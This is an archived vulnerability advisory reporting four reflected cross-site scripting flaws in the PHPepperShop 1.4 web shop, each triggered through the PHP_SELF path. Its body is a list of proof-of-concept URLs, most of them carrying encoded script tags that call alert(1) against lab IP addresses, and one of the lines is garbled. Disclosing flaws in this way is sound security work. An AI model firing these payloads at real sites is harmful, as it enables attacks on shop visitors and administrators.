TUCoPS :: HP Unsorted X :: va2006.htm

PHPepperShop v 1.4 XSS
XSS in PHPepperShop v 1.4
XSS in PHPepperShop v 1.4


Vulnerable Version:PHPepperShop v 1.4=0D
Homepage:http://www.phpeppershop.com=0D 
=0D
This is 4 reflective XSS flaws in the URI. Trust no one not even your $_SERVER[PHP_SELF]=0D
=0D
http://10.1.1.10/shop/kontakt.php/'=0D 
=0D
http://10.1.1.10/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E=0D 
=0D
http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E=0D 
=0D
alert(1)http://10.1.1.155/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH